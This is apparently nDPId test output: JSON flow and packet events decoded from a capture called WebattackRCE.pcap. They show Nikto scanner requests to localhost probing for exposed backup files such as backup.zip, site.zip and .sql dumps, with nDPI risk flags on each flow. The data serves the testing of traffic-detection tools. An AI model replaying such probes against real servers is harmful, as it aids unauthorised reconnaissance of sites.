+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1576420276986,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276986,"pkt":"AAAAAAAAAAAAAAAACABFAADC6rNAAEAGUYB\/AAABfwAAAcMcH5BJJNLw4gK1PYAYAED+tgAAAQEICp1m\/CKdZvwiR0VUIC9iYWNrdXAuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276987,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1576420276987,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276987,"pkt":"AAAAAAAAAAAAAAAACABFAADABtBAAEAGNWZ\/AAABfwAAAcMeH5DVkj6SMBYRsYAYAED+tAAAAQEICp1m\/COdZvwjR0VUIC9zaXRlLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276987,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1576420276989,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276989,"pkt":"AAAAAAAAAAAAAAAACABFAADAb4pAAEAGzKt\/AAABfwAAAcMgH5DktVfY9BOJ1YAYAED+tAAAAQEICp1m\/CWdZvwlR0VUIC9zaXRlLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1576420276990,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276990,"pkt":"AAAAAAAAAAAAAAAACABFAADGkTtAAEAGqvR\/AAABfwAAAcMiH5BqAalni+2D0IAYAED+ugAAAQEICp1m\/CadZvwmR0VUIC8xMjcuMC4wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1576420276992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276992,"pkt":"AAAAAAAAAAAAAAAACABFAADGaPFAAEAG0z5\/AAABfwAAAcMkH5B8x1CQWvOvzIAYAED+ugAAAQEICp1m\/CidZvwoR0VUIC8xMjcuMC4wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1576420276993,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276993,"pkt":"AAAAAAAAAAAAAAAACABFAADFOFRAAEAGA91\/AAABfwAAAcMmH5DTogAzSwYGfYAYAED+uQAAAQEICp1m\/CmdZvwpR0VUIC8xMjdfMF8wXzEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276995,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1576420276995,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276995,"pkt":"AAAAAAAAAAAAAAAACABFAADFLPBAAEAGD0F\/AAABfwAAAcMoH5DgsBSPBaIHeIAYAED+uQAAAQEICp1m\/CudZvwrR0VUIC8xMjdfMF8wXzEudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276995,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276996,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1576420276996,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276996,"pkt":"AAAAAAAAAAAAAAAACABFAADD0zFAAEAGaQF\/AAABfwAAAcMqH5Dy3etP7K3wrYAYAED+twAAAQEICp1m\/CydZvwsR0VUIC8xMjcuMC4wLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276996,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1576420276998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276998,"pkt":"AAAAAAAAAAAAAAAACABFAADDYPVAAEAG2z1\/AAABfwAAAcMsH5ARV1iTIbZBJoAYAED+twAAAQEICp1m\/C2dZvwtR0VUIC8xMjcuMC4wLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276999,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1576420276999,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276999,"pkt":"AAAAAAAAAAAAAAAACABFAADByvVAAEAGcT9\/AAABfwAAAcMuH5AHevKTkcnpoIAYAED+tQAAAQEICp1m\/C+dZvwvR0VUIC8xMjcwMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276999,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1576420277000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277000,"pkt":"AAAAAAAAAAAAAAAACABFAADBBihAAEAGNg1\/AAABfwAAAcMwH5BEgD5FJ0MuU4AYAED+tQAAAQEICp1m\/DCdZvwwR0VUIC8xMjcwMC50YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 